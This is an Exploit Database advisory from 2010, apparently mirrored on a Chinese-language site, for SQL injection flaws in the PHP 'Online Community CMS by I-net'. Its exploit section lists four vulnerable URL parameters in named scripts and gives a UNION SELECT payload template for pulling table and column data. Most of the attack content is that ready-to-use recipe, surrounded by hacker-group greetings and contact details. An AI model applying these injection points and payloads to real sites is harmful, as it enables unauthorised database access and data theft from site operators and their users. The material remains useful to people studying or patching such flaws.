Online Community CMS by I-net – SQL Injection

• Exploit Database
• 13 阅读

• 作者： Th3 RDX
  日期： 2010-03-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11774/

• # Exploit Title: Online Community CMS by I-net SQL Injection Vulnerability
  # Date: 16-03-2010
  # Author: Th3 RDX
  # Software Link: www.i-netsolution.com/online-community-php-scripts.html
  # Version:
  # Tested on: Projects Made By Them
  # category: webapp
  # Code :
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  Team I.C.W | www.IndiShell.in | Andhra Hackers | www.exploit-db.com
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  Gr33tz to all Indian Cyber Warriors ,IndiShell, Andhra Hackers
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  
  ##############################################################################
  %//
  
  ----- [ Founder ] -----
  
  Th3 RDX
  
  ----- [ E - mail ] -----
  
  th3rdx@gmail.com
  
  
  %\\
  ##############################################################################
  
  ##############################################################################
  %//
  
  ----- [Title] -----
  
  Online Community CMS by I-net SQL Injection Vulnerability
  
  ----- [ Vendor ] -----
  
  http://www.i-netsolution.com/online-community-php-scripts.html
  
  %\\
  ##############################################################################
  
  ##############################################################################
  %//
  
  ----- [ Exploit (s) ] -----
  
  Put [CODE] = SQL Injection Code
  {e.g = Union Select 1 ,2, UNHEX(HEX([visible])) ,4,5,6 (tables & column) }
  
  [SQLi] http://server/onlinecommunity/view-blog-full.php?blid=69[CODE]
  
  [SQLi] http://server/onlinecommunitys/mem-play-song-cnt.php?plid=23[CODE]
  
  [SQLi] http://server/onlinecommunity/mem_videos-play-cnt.php?vdoid=41[CODE]
  
  [SQLi] http://server/onlinecommunity/profile.php?mid=72[CODE]
  
  
  %\\
  ##############################################################################
  
  ##############################################################################
  
  
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  Thanks To All: I.C.W + W.O.I + H.M.G + C.I.A + AH Members
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  Bug discovered : 16 March 2010
  
  finish(0);
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=